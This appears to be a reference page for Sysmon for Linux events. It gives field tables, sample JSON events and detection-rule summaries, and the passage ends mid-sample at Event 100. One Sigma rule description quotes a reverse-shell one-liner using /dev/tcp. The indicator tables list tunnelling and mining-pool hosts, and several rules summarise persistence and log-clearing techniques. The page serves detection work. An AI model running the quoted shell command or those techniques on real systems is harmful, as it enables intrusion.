Sysmon for Linux

14 events across 1 channel

Event	Title	Sample
1	Process Create	Y
2	A process changed a file creation time	N
3	Network connection	Y
4	Sysmon service state changed	Y
5	Process terminated	Y
7	Shared library loaded	N
9	RawAccessRead	Y
10	Process accessed	Y
11	File created	Y
16	Sysmon config state changed	Y
22	DNS query	N
23	File Delete archived	Y
100	BPF program activity	Y
255	Error	N

Event ID 1: Process Create

Provider: Sysmon for Linux

Description

A new process has been created. Provides the full command line, image path, process GUID, parent process information, and user context. Equivalent to Sysmon for Windows Event ID 1.

Fields #

Name	Description	Rules
`RuleName`	Custom tag mapped to event
`UtcTime`	Time in UTC when event was created
`ProcessGuid`	Process GUID of the created process
`ProcessId`	Process ID of the created process
`Image`	File path of the process being created	449 detection rules
`FileVersion`	Version of the image associated with the process
`Description`	Description of the image associated with the process
`Product`	Product name the image belongs to
`Company`	Company name the image belongs to
`OriginalFileName`	Original file name
`CommandLine`	Arguments passed to the executable	1768 detection rules
`CurrentDirectory`	Current working directory of the process	4 detection rules
`User`	Name of the user who created the process	3 detection rules
`LogonGuid`	Logon GUID of the user who created the process
`LogonId`	Logon ID of the user who created the process	2 detection rules
`TerminalSessionId`	ID of the terminal session
`Hashes`	Hashes captured by Sysmon driver
`ParentProcessGuid`	Process GUID of the parent process
`ParentProcessId`	Process ID of the parent process
`ParentImage`	File path of the parent process	26 detection rules
`ParentCommandLine`	Arguments passed to the parent process executable	22 detection rules
`ParentUser`	Name of the user who owns the parent process

Example Event #

{
  "system": {
    "provider": "Linux-Sysmon",
    "guid": "{ff032593-a8d3-4f13-b0d6-01fc615a0f97}",
    "event_source_name": "",
    "event_id": 1,
    "version": 5,
    "level": 4,
    "task": 1,
    "opcode": 0,
    "keywords": 9223372036854775808,
    "time_created": "2026-06-21T17:30:01.467946000+00:00",
    "event_record_id": 2445127,
    "correlation": {},
    "execution": {
      "process_id": 313895,
      "thread_id": 313895
    },
    "channel": "Linux-Sysmon/Operational",
    "computer": "JD-debian-12-workstation",
    "security": {
      "user_id": "0"
    }
  },
  "event_data": {
    "RuleName": "-",
    "UtcTime": "2026-06-21 17:30:01.468",
    "ProcessGuid": "{370e939b-1f99-6a38-b93b-fa0470630000}",
    "ProcessId": "313953",
    "Image": "/usr/bin/dash",
    "FileVersion": "-",
    "Description": "-",
    "Product": "-",
    "Company": "-",
    "OriginalFileName": "-",
    "CommandLine": "/bin/sh -c echo DWCAP1782062994_a aaa 'b b b' && true",
    "CurrentDirectory": "/home/debian",
    "User": "root",
    "LogonGuid": "{370e939b-0000-0000-0000-000000000000}",
    "LogonId": "0",
    "TerminalSessionId": "214",
    "IntegrityLevel": "no level",
    "Hashes": "SHA1=b03cf680f3ff9dc5d50cee5037bc03780e14f76f,MD5=623e332d8ae2db8a2d050dcce9510b47,SHA256=f5adb8bf0100ed0f8c7782ca5f92814e9229525a4b4e0d401cf3bea09ac960a6",
    "ParentProcessGuid": "{370e939b-1f99-6a38-9d2b-c87b445d0000}",
    "ParentProcessId": "313950",
    "ParentImage": "/usr/bin/bash",
    "ParentCommandLine": "bash",
    "ParentUser": "root"
  },
  "message": ""
}

Common Indicators #

Field/value combinations most frequently checked by detection rules targeting this event, derived from cross-vendor predicate analysis.

Field	Kind	Value	Rules	Vendors
`CommandLine`	contains	`/bin/sh`	11 rules	sigma
`CommandLine`	contains	`/bin/bash`	8 rules	sigma
`CommandLine`	contains	`/bin/zsh`	8 rules	sigma
`CommandLine`	contains	`/bin/dash`	7 rules	sigma
`CommandLine`	contains	`/bin/fish`	7 rules	sigma
`CommandLine`	contains	`/tmp/`	7 rules	elastic, sigma
`Image`	ends_with	`/curl`	9 rules	sigma
`Image`	ends_with	`/esxcli`	9 rules	sigma
`Image`	ends_with	`/cat`	8 rules	sigma
`Image`	ends_with	`/bash`	7 rules	sigma
`Image`	ends_with	`/head`	7 rules	sigma
`Image`	ends_with	`/more`	7 rules	sigma
`Image`	ends_with	`/tail`	7 rules	sigma
`Image`	ends_with	`/sh`	6 rules	sigma
`Image`	ends_with	`/wget`	6 rules	sigma

Detection Rules #

View all rules referencing this event →

Sigma # view in coverage

Shell Invocation via Apt - Linux source medium: Detects the use of the "apt" and "apt-get" commands to execute a shell or proxy commands. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
Scheduled Task/Job At source low: Detects the use of at/atd which are utilities that are used to schedule tasks. They are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code
Audit Rules Deleted Via Auditctl source high: Detects the execution of 'auditctl' with the '-D' command line parameter, which deletes all configured audit rules and watches on Linux systems. This technique is commonly used by attackers to disable audit logging and cover their tracks by removing monitoring capabilities. Removal of audit rules can significantly impair detection of malicious activities on the affected system.

Show 17 more (141 total)

Kaspersky Endpoint Security Stopped Via CommandLine - Linux source high: Detects execution of the Kaspersky init.d stop script on Linux systems either directly or via systemctl. This activity may indicate a manual interruption of the antivirus service by an administrator, or it could be a sign of potential tampering or evasion attempts by malicious actors.
Suspicious Invocation of Shell via AWK - Linux source high: Detects the execution of "awk" or it's sibling commands, to invoke a shell using the system() function. This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.
Decode Base64 Encoded Text source low: Detects usage of base64 utility to decode arbitrary base64-encoded text
Linux Base64 Encoded Pipe to Shell source medium: Detects suspicious process command line that uses base64 encoded input for execution with a shell
Linux Base64 Encoded Shebang In CLI source medium: Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded
Bash Interactive Shell source low: Detects execution of the bash shell with the interactive flag "-i".
Enable BPF Kprobes Tracing source medium: Detects common command used to enable bpf kprobes tracing
BPFtrace Unsafe Option Usage source medium: Detects the usage of the unsafe bpftrace option
Linux Setgid Capability Set on a Binary via Setcap Utility source low: Detects the use of the 'setcap' utility to set the 'setgid' capability (cap_setgid) on a binary file. This capability allows a non privileged process to make arbitrary manipulations of group IDs (GIDs), including setting its current GID to a value that would otherwise be restricted (i.e. GID 0, the root group). This behavior can be used by adversaries to backdoor a binary in order to escalate privileges again in the future if needed.
Linux Setuid Capability Set on a Binary via Setcap Utility source low: Detects the use of the 'setcap' utility to set the 'setuid' capability (cap_setuid) on a binary file. This capability allows a non privileged process to make arbitrary manipulations of user IDs (UIDs), including setting its current UID to a value that would otherwise be restricted (i.e. UID 0, the root user). This behavior can be used by adversaries to backdoor a binary in order to escalate privileges again in the future if needed.
Capabilities Discovery - Linux source low: Detects usage of "getcap" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or other.
Capsh Shell Invocation - Linux source high: Detects the use of the "capsh" utility to invoke a shell.
Remove Immutable File Attribute source medium: Detects usage of the 'chattr' utility to remove immutable file attribute.
Chmod Targeting Sensitive Directories source medium: Detects chmod targeting files in sensitive directory paths on Linux systems. Attackers may use chmod to change permissions of files in these directories to maintain persistence, escalate privileges, or disrupt system operations.
Linux Sudo Chroot Execution source low: Detects the execution of 'sudo' command with '--chroot' option, which is used to change the root directory for command execution. Attackers may use this technique to evade detection and execute commands in a modified environment. This can be part of a privilege escalation strategy, as it allows the execution of commands with elevated privileges in a controlled environment as seen in CVE-2025-32463. While investigating, look out for unusual or unexpected use of 'sudo --chroot' in conjunction with other commands or scripts such as execution from temporary directories or unusual user accounts.
Linux Logs Clearing Attempts source medium: Detects logs clearing attempts on Linux systems via utilities such as 'rm', 'rmdir', 'shred', and 'unlink' targeting log files and directories. Adversaries often try to clear logs to cover their tracks after performing malicious activities.
Syslog Clearing or Removal Via System Utilities source high: Detects specific commands commonly used to remove or empty the syslog. Which is a technique often used by attacker as a method to hide their tracks

References #

Sysinternals: Sysmon for Linux (eBPF sensor) https://github.com/Sysinternals/SysmonForLinux

Event ID 2: A process changed a file creation time

Provider: Sysmon for Linux

Description

A process explicitly modified a file creation time. Helps track the real creation time of files on Linux.

Fields #

Name	Description
`RuleName`	Custom tag mapped to event
`UtcTime`	Time in UTC when event was created
`ProcessGuid`	Process GUID of the process that changed the file creation time
`ProcessId`	Process ID of the process changing the file creation time
`Image`	File path of the process that changed the file creation time
`TargetFilename`	Full path name of the file
`CreationUtcTime`	New creation time of the file
`PreviousCreationUtcTime`	Previous creation time of the file
`User`	Name of the user who changed the file creation time

References #

Sysinternals: Sysmon for Linux (eBPF sensor) https://github.com/Sysinternals/SysmonForLinux

Event ID 3: Network connection

Provider: Sysmon for Linux

Description

A network connection was detected. Logs TCP/UDP connections with source and destination host, port, and process information.

Fields #

Name	Description	Rules
`RuleName`	Custom tag mapped to event
`UtcTime`	Time in UTC when event was created
`ProcessGuid`	Process GUID of the process that made the network connection
`ProcessId`	Process ID of the process that made the network connection
`Image`	File path of the process that made the network connection	1 detection rule
`User`	Name of the user who owns the process
`Protocol`	Network protocol used (tcp or udp)
`Initiated`	Whether the process initiated the connection	2 detection rules
`SourceIsIpv6`	Whether the source address is IPv6
`SourceIp`	Source IP address
`SourceHostname`	Source hostname
`SourcePort`	Source port number
`DestinationIsIpv6`	Whether the destination address is IPv6
`DestinationIp`	Destination IP address	2 detection rules
`DestinationHostname`	Destination hostname	31 detection rules
`DestinationPort`	Destination port number	10 detection rules

Example Event #

{
  "system": {
    "provider": "Linux-Sysmon",
    "guid": "{ff032593-a8d3-4f13-b0d6-01fc615a0f97}",
    "event_source_name": "",
    "event_id": 3,
    "version": 5,
    "level": 4,
    "task": 3,
    "opcode": 0,
    "keywords": 9223372036854775808,
    "time_created": "2026-06-21T17:30:02.050074000+00:00",
    "event_record_id": 2445208,
    "correlation": {},
    "execution": {
      "process_id": 313895,
      "thread_id": 313895
    },
    "channel": "Linux-Sysmon/Operational",
    "computer": "JD-debian-12-workstation",
    "security": {
      "user_id": "0"
    }
  },
  "event_data": {
    "RuleName": "-",
    "UtcTime": "2026-06-21 17:30:02.057",
    "ProcessGuid": "{370e939b-1f9a-6a38-15b4-a15748570000}",
    "ProcessId": "313982",
    "Image": "/usr/bin/curl",
    "User": "root",
    "Protocol": "udp",
    "Initiated": "true",
    "SourceIsIpv6": "false",
    "SourceIp": "10.2.10.81",
    "SourceHostname": "-",
    "SourcePort": "1893",
    "SourcePortName": "-",
    "DestinationIsIpv6": "false",
    "DestinationIp": "10.2.10.254",
    "DestinationHostname": "-",
    "DestinationPort": "30817",
    "DestinationPortName": "-"
  },
  "message": ""
}

Common Indicators #

Field/value combinations most frequently checked by detection rules targeting this event, derived from cross-vendor predicate analysis.

Field	Kind	Value	Rules	Vendors
`Initiated`	eq	`true`	2 rules	sigma
`DestinationHostname`	contains	`tunnel.ap.ngrok.com`	1 rule	sigma
`DestinationHostname`	contains	`tunnel.au.ngrok.com`	1 rule	sigma
`DestinationHostname`	contains	`tunnel.eu.ngrok.com`	1 rule	sigma
`DestinationHostname`	contains	`tunnel.in.ngrok.com`	1 rule	sigma
`DestinationHostname`	contains	`tunnel.jp.ngrok.com`	1 rule	sigma
`DestinationHostname`	contains	`tunnel.sa.ngrok.com`	1 rule	sigma
`DestinationHostname`	contains	`tunnel.us.ngrok.com`	1 rule	sigma
`DestinationHostname`	ends_with	`.localto.net`	1 rule	sigma
`DestinationHostname`	ends_with	`.localtonet.com`	1 rule	sigma
`DestinationHostname`	eq	`ca.minexmr.com`	1 rule	sigma
`DestinationHostname`	eq	`de.minexmr.com`	1 rule	sigma
`DestinationHostname`	eq	`fr.minexmr.com`	1 rule	sigma
`DestinationHostname`	eq	`mine.c3pool.com`	1 rule	sigma
`DestinationHostname`	eq	`monerocean.stream`	1 rule	sigma

Detection Rules #

View all rules referencing this event →

Sigma # view in coverage

Linux Reverse Shell Indicator source critical: Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
Linux Crypto Mining Pool Connections source high: Detects process connections to a Monero crypto mining pool
Communication To LocaltoNet Tunneling Service Initiated - Linux source high: Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.

Show 2 more (5 total)

Communication To Ngrok Tunneling Service - Linux source high: Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors
Potentially Suspicious Malware Callback Communication - Linux source high: Detects programs that connect to known malware callback ports based on threat intelligence reports.

References #

Sysinternals: Sysmon for Linux (eBPF sensor) https://github.com/Sysinternals/SysmonForLinux

Event ID 4: Sysmon service state changed

Provider: Sysmon for Linux

Description

The Sysmon for Linux service state changed (started or stopped).

Fields #

Name	Description
`UtcTime`	Time in UTC when event was created
`State`	New state of the Sysmon service (Started or Stopped)
`Version`	Sysmon version
`SchemaVersion`	Sysmon configuration schema version

Example Event #

{
  "system": {
    "provider": "Linux-Sysmon",
    "guid": "{ff032593-a8d3-4f13-b0d6-01fc615a0f97}",
    "event_source_name": "",
    "event_id": 4,
    "version": 3,
    "level": 4,
    "task": 4,
    "opcode": 0,
    "keywords": 9223372036854775808,
    "time_created": "2026-06-21T17:29:54.981574000+00:00",
    "event_record_id": 2445001,
    "correlation": {},
    "execution": {
      "process_id": 308429,
      "thread_id": 308429
    },
    "channel": "Linux-Sysmon/Operational",
    "computer": "JD-debian-12-workstation",
    "security": {
      "user_id": "0"
    }
  },
  "event_data": {
    "UtcTime": "2026-06-21 17:29:54.981",
    "State": "Stopped",
    "Version": "1.5.1",
    "SchemaVersion": "4.90"
  },
  "message": ""
}

References #

Sysinternals: Sysmon for Linux (eBPF sensor) https://github.com/Sysinternals/SysmonForLinux

Event ID 5: Process terminated

Provider: Sysmon for Linux

Description

A process has terminated. Logs the process GUID, PID, and image path of the terminated process.

Fields #

Name	Description
`RuleName`	Custom tag mapped to event
`UtcTime`	Time in UTC when event was created
`ProcessGuid`	Process GUID of the terminated process
`ProcessId`	Process ID of the terminated process
`Image`	File path of the terminated process
`User`	Name of the user who owned the process

Example Event #

{
  "system": {
    "provider": "Linux-Sysmon",
    "guid": "{ff032593-a8d3-4f13-b0d6-01fc615a0f97}",
    "event_source_name": "",
    "event_id": 5,
    "version": 3,
    "level": 4,
    "task": 5,
    "opcode": 0,
    "keywords": 9223372036854775808,
    "time_created": "2026-06-21T17:30:01.410643000+00:00",
    "event_record_id": 2445105,
    "correlation": {},
    "execution": {
      "process_id": 313895,
      "thread_id": 313895
    },
    "channel": "Linux-Sysmon/Operational",
    "computer": "JD-debian-12-workstation",
    "security": {
      "user_id": "0"
    }
  },
  "event_data": {
    "RuleName": "-",
    "UtcTime": "2026-06-21 17:30:01.417",
    "ProcessGuid": "{370e939b-1f97-6a38-0936-d2a36d5e0000}",
    "ProcessId": "313921",
    "Image": "/usr/bin/sleep",
    "User": "root"
  },
  "message": ""
}

References #

Sysinternals: Sysmon for Linux (eBPF sensor) https://github.com/Sysinternals/SysmonForLinux

Event ID 7: Shared library loaded

Provider: Sysmon for Linux

Description

A shared library (.so) was loaded into a process address space. Logs the image, loaded library path, and hash information.

Fields #

Name	Description
`RuleName`	Custom tag mapped to event
`UtcTime`	Time in UTC when event was created
`ProcessGuid`	Process GUID of the process loading the library
`ProcessId`	Process ID of the process loading the library
`Image`	File path of the process loading the library
`ImageLoaded`	Full path of the shared library loaded
`FileVersion`	Version of the loaded shared library
`Description`	Description of the loaded shared library
`Product`	Product name the shared library belongs to
`Company`	Company name the shared library belongs to
`OriginalFileName`	Original file name of the shared library
`Hashes`	Hashes of the loaded shared library
`Signed`	Whether the shared library is signed
`Signature`	Signer of the shared library
`SignatureStatus`	Status of the signature verification
`User`	Name of the user who owns the process

References #

Sysinternals: Sysmon for Linux (eBPF sensor) https://github.com/Sysinternals/SysmonForLinux

Event ID 9: RawAccessRead

Provider: Sysmon for Linux

Description

A process performed a raw read operation on a device. Useful for detecting attempts to read data outside the filesystem layer.

Fields #

Name	Description
`RuleName`	Custom tag mapped to event
`UtcTime`	Time in UTC when event was created
`ProcessGuid`	Process GUID of the process performing raw access
`ProcessId`	Process ID of the process performing raw access
`Image`	File path of the process performing raw access
`Device`	Target device of the raw access read
`User`	Name of the user who owns the process

Example Event #

{
  "system": {
    "provider": "Linux-Sysmon",
    "guid": "{ff032593-a8d3-4f13-b0d6-01fc615a0f97}",
    "event_source_name": "",
    "event_id": 9,
    "version": 2,
    "level": 4,
    "task": 9,
    "opcode": 0,
    "keywords": 9223372036854775808,
    "time_created": "2026-06-21T17:30:02.704246000+00:00",
    "event_record_id": 2445239,
    "correlation": {},
    "execution": {
      "process_id": 313895,
      "thread_id": 313895
    },
    "channel": "Linux-Sysmon/Operational",
    "computer": "JD-debian-12-workstation",
    "security": {
      "user_id": "0"
    }
  },
  "event_data": {
    "RuleName": "-",
    "UtcTime": "2026-06-21 17:30:02.708",
    "ProcessGuid": "{370e939b-1f9a-6a38-19e1-520a075c0000}",
    "ProcessId": "313994",
    "Image": "/usr/bin/dd",
    "Device": "/dev/vda",
    "User": "-"
  },
  "message": ""
}

References #

Sysinternals: Sysmon for Linux (eBPF sensor) https://github.com/Sysinternals/SysmonForLinux

Event ID 10: Process accessed

Provider: Sysmon for Linux

Description

A process opened a handle to another process (for example to read or write its memory). Logs the source and target process, the granted access rights, and the call stack. Equivalent to Sysmon for Windows Event ID 10.

Fields #

Name	Description
`RuleName`	Custom tag mapped to event
`UtcTime`	Time in UTC when event was created
`SourceProcessGUID`	Process GUID of the source process that opened the target
`SourceProcessId`	Process ID of the source process
`SourceThreadId`	Thread ID within the source process that made the access
`SourceImage`	File path of the source process
`TargetProcessGUID`	Process GUID of the target process being accessed
`TargetProcessId`	Process ID of the target process
`TargetImage`	File path of the target process
`GrantedAccess`	Access rights the source process requested on the target
`CallTrace`	Stack trace at the point of access
`SourceUser`	Name of the user who owns the source process
`TargetUser`	Name of the user who owns the target process

Example Event #

{
  "system": {
    "provider": "Linux-Sysmon",
    "guid": "{ff032593-a8d3-4f13-b0d6-01fc615a0f97}",
    "event_source_name": "",
    "event_id": 10,
    "version": 3,
    "level": 4,
    "task": 10,
    "opcode": 0,
    "keywords": 9223372036854775808,
    "time_created": "2026-06-21T17:30:03.138735000+00:00",
    "event_record_id": 2445252,
    "correlation": {},
    "execution": {
      "process_id": 313895,
      "thread_id": 313895
    },
    "channel": "Linux-Sysmon/Operational",
    "computer": "JD-debian-12-workstation",
    "security": {
      "user_id": "0"
    }
  },
  "event_data": {
    "RuleName": "-",
    "UtcTime": "2026-06-21 17:30:03.145",
    "SourceProcessGUID": "{370e939b-1f9a-6a38-8912-6d0000000000}",
    "SourceProcessId": "313999",
    "SourceThreadId": "313999",
    "SourceImage": "/usr/bin/python3.11",
    "TargetProcessGUID": "{370e939b-1f9a-6a38-0956-aecb95590000}",
    "TargetProcessId": "314000",
    "TargetImage": "/usr/bin/sleep",
    "GrantedAccess": "0x0",
    "CallTrace": "-",
    "SourceUser": "root",
    "TargetUser": "root"
  },
  "message": ""
}

References #

Sysinternals: Sysmon for Linux (eBPF sensor) https://github.com/Sysinternals/SysmonForLinux

Event ID 11: File created

Provider: Sysmon for Linux

Description

A file was created or overwritten. Logs the creating process and the target file path.

Fields #

Name	Description	Rules
`RuleName`	Custom tag mapped to event
`UtcTime`	Time in UTC when event was created
`ProcessGuid`	Process GUID of the process that created the file
`ProcessId`	Process ID of the process that created the file
`Image`	File path of the process that created the file	4 detection rules
`TargetFilename`	Full path of the created file	85 detection rules
`CreationUtcTime`	Creation time of the file in UTC
`User`	Name of the user who owns the process

Example Event #

{
  "system": {
    "provider": "Linux-Sysmon",
    "guid": "{ff032593-a8d3-4f13-b0d6-01fc615a0f97}",
    "event_source_name": "",
    "event_id": 11,
    "version": 2,
    "level": 4,
    "task": 11,
    "opcode": 0,
    "keywords": 9223372036854775808,
    "time_created": "2026-06-21T17:30:02.011073000+00:00",
    "event_record_id": 2445205,
    "correlation": {},
    "execution": {
      "process_id": 313895,
      "thread_id": 313895
    },
    "channel": "Linux-Sysmon/Operational",
    "computer": "JD-debian-12-workstation",
    "security": {
      "user_id": "0"
    }
  },
  "event_data": {
    "RuleName": "-",
    "UtcTime": "2026-06-21 17:30:01.995",
    "ProcessGuid": "{370e939b-1f99-6a38-b94b-810454620000}",
    "ProcessId": "313980",
    "Image": "/usr/bin/dash",
    "TargetFilename": "/tmp/DWCAP1782062994_nob",
    "CreationUtcTime": "2026-06-21 17:30:01.995",
    "User": "nobody"
  },
  "message": ""
}

Common Indicators #

Field/value combinations most frequently checked by detection rules targeting this event, derived from cross-vendor predicate analysis.

Field	Kind	Value	Rules	Vendors
`Image`	contains	`/python3`	1 rule	sigma
`Image`	ends_with	`/curl`	1 rule	sigma
`Image`	ends_with	`/wget`	1 rule	sigma
`TargetFilename`	contains	`/etc/profile.d/`	1 rule	sigma, splunk
`TargetFilename`	ends_with	`.class`	1 rule	sigma
`TargetFilename`	ends_with	`.java`	1 rule	sigma
`TargetFilename`	ends_with	`.jsp`	1 rule	sigma, splunk
`TargetFilename`	ends_with	`.pth`	1 rule	sigma
`TargetFilename`	ends_with	`/etc/doas.conf`	1 rule	sigma, splunk
`TargetFilename`	regex_match	`(?i)/lib/python3\.([5-9]\|[0-9]{2})/site-packages/`	1 rule	sigma
`TargetFilename`	starts_with	`/tmp/`	1 rule	elastic, sigma
`TargetFilename`	starts_with	`/var/tmp/`	1 rule	elastic, sigma

Detection Rules #

View all rules referencing this event →

Sigma # view in coverage

Linux Doas Conf File Creation source medium: Detects the creation of doas.conf file in linux host platform.
Persistence Via Sudoers.d Files source medium: Detects the creation or modification of files within the "sudoers.d" directory on Linux systems. Such activity may indicate an attempt to establish or maintain privilege escalation by granting specific users elevated permissions. Unauthorized changes to sudoers files are a common technique used by attackers to persist administrative access.
New Cron File Created source low: Detects the creation of cron files in Cron directories, which could indicate potential persistence mechanisms being established by an attacker. Note that not all cron file creations are malicious - legitimate system administration activities and software installations may also create cron files. This detection should be investigated in context, considering factors such as the user creating the file, the timing of creation, and the contents of the cron job. Focus investigation on unexpected cron files created by non-administrative users or during suspicious timeframes. Additionally, it is recommended to review the contents of the newly created cron files to assess their intent. Furthermore, it is suggested to baseline normal cron file creation and apply additional filters to reduce false positives based on the specific environment.

Show 14 more (17 total)

Suspicious Filename with Embedded Base64 Commands source high: Detects files with specially crafted filenames that embed Base64-encoded bash payloads designed to execute when processed by shell scripts. These filenames exploit shell interpretation quirks to trigger hidden commands, a technique observed in VShell malware campaigns.
Potentially Suspicious Shell Script Creation in Profile Folder source low: Detects the creation of shell scripts under the "profile.d" path.
Triple Cross eBPF Rootkit Default LockFile source high: Detects the creation of the file "rootlog" which is used by the TripleCross rootkit as a way to check if the backdoor is already running.
Triple Cross eBPF Rootkit Default Persistence source high: Detects the creation of "ebpfbackdoor" files in both "cron.d" and "sudoers.d" directories. Which both are related to the TripleCross persistence method
Wget Creating Files in Tmp Directory source medium: Detects the use of wget to download content in a temporary directory such as "/tmp" or "/var/tmp"
UNC4841 - Email Exfiltration File Pattern source high: Detects filename pattern of email related data used by UNC4841 for staging and exfiltration
UNC4841 - Barracuda ESG Exploitation Indicators source high: Detects file indicators as seen used by UNC4841 during their Barracuda ESG zero day exploitation.
Potential SAP NetWeaver Webshell Creation - Linux source medium: Detects the creation of suspicious files (jsp, java, class) in SAP NetWeaver directories, which may indicate exploitation attempts of vulnerabilities such as CVE-2025-31324.
Non-Standard Nsswitch.Conf Creation - Potential CVE-2025-32463 Exploitation source high: Detects the creation of nsswitch.conf files in non-standard directories, which may indicate exploitation of CVE-2025-32463. This vulnerability requires an attacker to create a nsswitch.conf in a directory that will be used during sudo chroot operations. When sudo executes, it loads malicious shared libraries from user-controlled locations within the chroot environment, potentially leading to arbitrary code execution and privilege escalation.
Shai-Hulud Malicious GitHub Workflow Creation source high: Detects creation of shai-hulud-workflow.yml file associated with Shai Hulud worm targeting NPM supply chain attack that exfiltrates GitHub secrets
Axios NPM Compromise File Creation Indicators - Linux source high: Detects file creation events linked to the Axios NPM supply chain compromise. Axios is a popular JavaScript HTTP client. On March 30, 2026, malicious versions (1.14.1, 0.30.4) were published to npm, injecting a dependency (plain-crypto-js@4.2.1) that executed a postinstall script as a cross-platform RAT dropper.
TeamPCP LiteLLM Supply Chain Attack Persistence Indicators source high: Detects the creation of specific persistence files as observed in the LiteLLM PyPI supply chain attack. In March 2026, a supply chain attack was discovered involving the popular open-source LLM framework LiteLLM by Threat Actor TeamPCP. The malicious package harvests every credential on the system, encrypts and exfiltrates them, and installs a persistent C2 backdoor.
Python Path Configuration File Creation - Linux source medium: Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence. Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script. Default paths are '\lib\site-packages*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).
Potentially Suspicious Long Filename Pattern - Linux source low: Detects the creation of files with unusually long filenames (100 or more characters), which may indicate obfuscation techniques used by malware such as VShell. This is a hunting rule to identify potential threats that use long filenames to evade detection. Keep in mind that on a legitimate system, such long filenames can and are common. Run this detection in the context of threat hunting rather than alerting. Adjust the threshold of filename length as needed based on your environment.

References #

Sysinternals: Sysmon for Linux (eBPF sensor) https://github.com/Sysinternals/SysmonForLinux

Event ID 16: Sysmon config state changed

Provider: Sysmon for Linux

Description

The Sysmon for Linux configuration was updated. Logs the new configuration hash.

Fields #

Name	Description
`UtcTime`	Time in UTC when event was created
`Configuration`	Name of the Sysmon configuration file
`ConfigurationFileHash`	Hash of the Sysmon configuration file

Example Event #

{
  "system": {
    "provider": "Linux-Sysmon",
    "guid": "{ff032593-a8d3-4f13-b0d6-01fc615a0f97}",
    "event_source_name": "",
    "event_id": 16,
    "version": 3,
    "level": 4,
    "task": 16,
    "opcode": 0,
    "keywords": 9223372036854775808,
    "time_created": "2026-06-21T17:29:56.377582000+00:00",
    "event_record_id": 2445002,
    "correlation": {},
    "execution": {
      "process_id": 313895,
      "thread_id": 313895
    },
    "channel": "Linux-Sysmon/Operational",
    "computer": "JD-debian-12-workstation",
    "security": {
      "user_id": "0"
    }
  },
  "event_data": {
    "UtcTime": "2026-06-21 17:29:56.377",
    "Configuration": "/opt/sysmon/config.xml",
    "ConfigurationFileHash": "SHA1=827f50f67b592c10093ae52baa2b2c8b8472092c,MD5=826f4a072b7fd5787904d003ddc2748a,SHA256=8678f75b19b86da3d957f4eb76f894d6bb19737b7a404aa2d943588def9f795c"
  },
  "message": ""
}

References #

Sysinternals: Sysmon for Linux (eBPF sensor) https://github.com/Sysinternals/SysmonForLinux

Event ID 22: DNS query

Provider: Sysmon for Linux

Description

A DNS query was issued by a process. Logs the queried domain name, query type, and query results.

Fields #

Name	Description
`RuleName`	Custom tag mapped to event
`UtcTime`	Time in UTC when event was created
`ProcessGuid`	Process GUID of the process that issued the DNS query
`ProcessId`	Process ID of the process that issued the DNS query
`QueryName`	DNS name queried
`QueryType`	DNS query type (e.g. A, AAAA, CNAME)
`QueryStatus`	Status of the DNS query
`QueryResults`	Results of the DNS query
`Image`	File path of the process that issued the DNS query
`User`	Name of the user who owns the process

References #

Sysinternals: Sysmon for Linux (eBPF sensor) https://github.com/Sysinternals/SysmonForLinux

Event ID 23: File Delete archived

Provider: Sysmon for Linux

Description

A file was deleted and an archived copy was preserved. Logs the process, target file, and hash information.

Fields #

Name	Description
`RuleName`	Custom tag mapped to event
`UtcTime`	Time in UTC when event was created
`ProcessGuid`	Process GUID of the process that deleted the file
`ProcessId`	Process ID of the process that deleted the file
`User`	Name of the user who owns the process
`Image`	File path of the process that deleted the file
`TargetFilename`	Full path of the deleted file
`Hashes`	Hashes of the deleted file
`IsExecutable`	Whether the deleted file was executable

Example Event #

{
  "system": {
    "provider": "Linux-Sysmon",
    "guid": "{ff032593-a8d3-4f13-b0d6-01fc615a0f97}",
    "event_source_name": "",
    "event_id": 23,
    "version": 5,
    "level": 4,
    "task": 23,
    "opcode": 0,
    "keywords": 9223372036854775808,
    "time_created": "2026-06-21T17:30:02.005258000+00:00",
    "event_record_id": 2445201,
    "correlation": {},
    "execution": {
      "process_id": 313895,
      "thread_id": 313895
    },
    "channel": "Linux-Sysmon/Operational",
    "computer": "JD-debian-12-workstation",
    "security": {
      "user_id": "0"
    }
  },
  "event_data": {
    "RuleName": "-",
    "UtcTime": "2026-06-21 17:30:01.996",
    "ProcessGuid": "{370e939b-1f99-6a38-197a-b030e5640000}",
    "ProcessId": "313981",
    "User": "nobody",
    "Image": "/usr/bin/rm",
    "TargetFilename": "/tmp/DWCAP1782062994_nob",
    "Hashes": "-",
    "IsExecutable": "-",
    "Archived": "-"
  },
  "message": ""
}

References #

Sysinternals: Sysmon for Linux (eBPF sensor) https://github.com/Sysinternals/SysmonForLinux

Event ID 100: BPF program activity

Provider: Sysmon for Linux

Description

An eBPF operation was observed via the bpf() syscall (for example BPF_PROG_LOAD). Logs the BPF command, program type, program id, and program name, plus the issuing process and user. Specific to Sysmon for Linux; no Sysmon for Windows equivalent.

Fields #

Name	Description
`RuleName`	Custom tag mapped to event
`UtcTime`	Time in UTC when event was created
`ProcessGuid`	Process GUID of the process issuing the BPF operation
`ProcessId`	Process ID of the process issuing the BPF operation
`Image`	File path of the process issuing the BPF operation
`User`	Name of the user who owns the process
`BpfCommand`	bpf() syscall command (for example BPF_PROG_LOAD)
`BpfProgramType`	Type of the eBPF program (for example SOCKET_FILTER)
`BpfProgramId`	Kernel-assigned identifier of the eBPF program
`BpfProgramName`	Name of the eBPF program

Example Event #

{
  "system": {
    "provider": "Linux-Sysmon",
    "guid": "{ff032593-a8d3-4f13-b0d6-01fc615a0f97}",
    "event_source_name": "",
    "event_id": 100,
    "version": 0,
    "level": 0,
    "task": 0,
    "opcode": 0,
    "keywords": 0,
